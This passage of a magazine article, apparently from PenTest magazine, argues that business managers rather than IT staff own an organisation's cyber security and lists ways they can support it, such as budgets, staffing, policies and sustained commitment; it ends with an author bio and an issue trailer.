Providing this confidence means implementing a proper<br />
cyber security program to prevent, detect and respond to<br />
unauthorized entry into a computer network. However, an<br />
important question that arises in all these discussions<br />
is: who owns cyber security in an organization? Most would<br />
immediately say the owners are (or should be) the people<br />
supporting the IT equipment. After all, you might argue,<br />
those techies are the ones babysitting the computer<br />
systems. But this is an incorrect assumption. The true<br />
owners of cyber security are the business managers of your<br />
organization. Your organization may have hired IT staff or<br />
external vendors to manage the IT infrastructure, but from<br />
a business perspective they are not the owners of your<br />
cyber security. For example, if your server gets hacked<br />
and funds are stolen from customer accounts, the techies<br />
cannot be solely blamed for the crime and the reputation<br />
damage. They may technically operate the system, but it is<br />
your business managers who must understand the potential<br />
financial, reputational and legal losses from cyber<br />
attacks. In most organizations business managers do not<br />
understand (or try to understand) the technical<br />
department's work and constraints, and technical people do<br />
not understand (or try to understand) the business<br />
people's needs. This does not mean business managers must<br />
become techies themselves, but they can support cyber<br />
security by doing the following for their techies.<br />
Knowledge<br />
The advancement and easy availability of new and useful<br />
technologies has enabled thousands of organizations<br />
worldwide to become heavily dependent on technology for<br />
running their businesses. Today it is not possible to run<br />
any organization, small or big, without some computer or<br />
telecom technology. With so much hardware, software and<br />
networking equipment in use, business managers need to be<br />
aware of the advantages and the risks of the technology<br />
they depend on. That does not mean they start operating<br />
the computers themselves, but they must understand the<br />
financial, reputational, regulatory and legal consequences<br />
of a cyber security incident.<br />
Financial Support<br />
Provide the necessary budgets for comprehensive<br />
maintenance of hardware, software, telecom equipment,<br />
spares, backup devices, etc. For example, suppose your<br />
business managers do not approve the purchase of a good<br />
firewall and intrusion prevention system, or fail to take<br />
out a hardware maintenance contract for an important<br />
server. The IT staff will then not be able to do much in<br />
the event of a hack, data loss or some other technical<br />
problem on that server.<br />
Provide Proper Manpower<br />
Reduced manpower and facilities in critical areas will<br />
inevitably, directly or indirectly, affect the business.<br />
It is worth highlighting that no matter how secure the<br />
technology is, people are still the key to real security.<br />
If employees do not see security as a priority, even the<br />
most secure system can easily be broken into. Even with<br />
robust technology there is always a need for high-quality<br />
staff and proper security education agreed between the<br />
business and its employees. After all, unprofessional or<br />
disaffected users all too often pass critical information<br />
such as passwords, known loopholes and access codes to<br />
others. Secondly, your business managers must ensure that<br />
departments have the necessary manpower in all areas. It<br />
is very common for organizations to skimp on manpower<br />
for support and maintenance and still demand the best<br />
from a skeleton workforce. The saying "Hire an Einstein,<br />
but refuse his request for a blackboard" describes a<br />
situation that is prevalent in many organizations.<br />
Implement recommendations<br />
Your business managers must listen to the recommendations<br />
of technical and support staff for implementing a proper<br />
intrusion prevention environment. Establishing such an<br />
environment is expensive, and not every critical IT<br />
function can be worked around with a low-cost alternative.<br />
It is common practice in many organizations to ignore IT<br />
and non-IT recommendations with standard excuses, such as<br />
cost, even when the organization can perfectly well afford<br />
them. If you are serious about intrusion prevention, your<br />
senior management must support the costs and budgets<br />
needed to implement all sensible recommendations, industry<br />
standards and workarounds.<br />
Get involved<br />
Senior management, including the CEO, must get involved in<br />
all aspects of the organization's intrusion prevention<br />
processes. Adopt a "show me" or "prove it to me" attitude<br />
to ensure your business is truly protected: ask for the<br />
evidence, such as penetration test reports, audit findings<br />
and incident records, rather than accepting assurances.<br />
For many organizations a proper cyber security program is<br />
now a mandatory business and audit requirement, so it<br />
should not be taken lightly.<br />
Policies<br />
Just like other essential policies in HR, finance, etc.,<br />
a proper intrusion prevention policy must be enforced for<br />
all critical systems by senior management. Secondly, all<br />
concerned employees must be trained to recognize and<br />
report suspicious activity on their computer systems.<br />
Periodic audits must be conducted to ensure employees are<br />
following all policies and processes.<br />
Sustained commitment<br />
Cyber security is like insurance: it costs money<br />
constantly. It is not enough to show interest and invest<br />
some money on a one-off basis. One of the primary<br />
roadblocks to cyber security is a lack of sustained top<br />
management commitment. For example, top management may<br />
approve the establishment of a good cyber security system<br />
at a time when they are particularly influenced by<br />
business and competitive pressures, but later be unwilling<br />
to invest the ongoing budget and manpower needed to keep<br />
it fully operational. The result is systems that become<br />
outdated, unpatched and vulnerable to attack. Continuous<br />
commitment and expenditure are required to keep up with<br />
current cyber security standards.<br />
In spite of all precautions it is still possible to get<br />
hacked. Nevertheless, with this kind of involvement from<br />
business managers your organization will be far better<br />
placed to prevent most attacks and to detect and recover<br />
from the ones that get through. Finally, we can end this<br />
article with a quote from David Brower: "All technology<br />
should be assumed guilty until proven innocent."<br />
THEJENDRA<br />
Thejendra is an IT manager from India. He is also the author<br />
of Practical IT Service Management, Disaster Recovery &<br />
Business Continuity, God is No Angel, etc. Visit his web cave –<br />
www.thejendra.com for more details.<br />
In the next issue of<br />
Mobile Pentesting<br />
Available to download on January 8th<br />
Soon in PenTest!<br />
• Shawn Valle<br />
• Daniel O‘Donor<br />
• Mouad Zahrane<br />
• Colin Schwingen<br />
If you would like to contact the PenTest team, just send an email to<br />
maciej.kozuszek@software.com.pl or<br />
ewa.dudzic@software.com.pl. We will reply a.s.a.p.